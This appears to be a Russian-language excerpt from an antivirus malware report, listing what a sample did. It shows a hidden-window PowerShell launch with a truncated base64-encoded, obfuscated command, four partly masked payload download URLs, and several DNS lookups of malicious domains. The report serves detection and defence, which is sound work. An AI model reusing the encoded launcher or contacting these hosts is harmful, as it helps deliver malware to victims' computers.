Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAHUAZgBhAG0ANwBnAD0AKAAoACcAQQAyAHgAJwArACcAMgAnACkAKwAoACcAbgAnACsAJwByAHcAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAcwBlAFIAUAByAE8AZgBpAEwARQBcAFQAZgA2AF...
- http://ca####studios.com/images/Z/
- http://am####tobh.com.br/sys-cache/eXhf8Nc/
- http://ca###uducvan.vn/wp-admin/PCsGWi/
- http://og###ivola.it/5doedb3/3Nk/
- DNS ASK ca####studios.com
- DNS ASK kh##eb.xyz
- DNS ASK am####tobh.com.br
- DNS ASK ca###uducvan.vn
- DNS ASK se#####zihaberleri.com
- DNS ASK og###ivola.it
- DNS ASK ha###one.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAHUAZgBhAG0ANwBnAD0AKAAoACcAQQAyAHgAJwArACcAMgAnACkAKwAoACcAbgAnACsAJwByAHcAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAcwBlAFIAUAByAE8AZgBpAEwARQBcAFQAZgA2AF...' (со скрытым окном)